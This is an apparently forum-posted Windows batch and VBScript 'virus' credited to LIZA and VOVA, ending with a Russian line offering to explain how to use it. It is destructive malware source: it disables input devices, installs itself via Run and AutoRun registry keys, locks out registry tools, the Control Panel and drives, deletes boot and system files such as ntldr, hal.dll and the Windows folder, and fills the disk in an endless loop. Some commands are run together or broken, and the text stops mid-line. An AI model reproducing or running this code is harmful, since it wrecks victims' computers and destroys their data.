@Echo off rundll32 keyboard,disable rundll32 mouse,disable copy %0 %windir%/system %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul taskkill /f /im explorer.exe >nul del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul del "%SystemRoot%\Media" /q >nul reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul del "%SystemRoot%Cursors*.*" >nul del c:Program Files/ FOR /L %%i IN (1,1,1000000) DO md %%i :x Start mspaint goto x copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul assoc .lnk=.txt echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs echo do >> %systemdrive%\windows\system32\rundll32.vbs echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs echo loop >> %systemdrive%\windows\system32\rundll32.vbs
start %systemdrive%\windows\system32\rundll32.vbs
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f @echo This virus created by LIZA @echo Virus: pcforumhack.ruTM Virus @echo Autor: VOVA @echo off echo Chr(39)>%temp%\temp1.vbs echo Chr(39)>%temp%\temp2.vbs echo on error resume next > %temp%\temp.vbs echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0 copy %¶§% %SystemRoot%\user32dll.bat reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ruTM">>%temp%\temp.vbs echo s.regw
Кому интересно, пишите объясню что с этим делать
|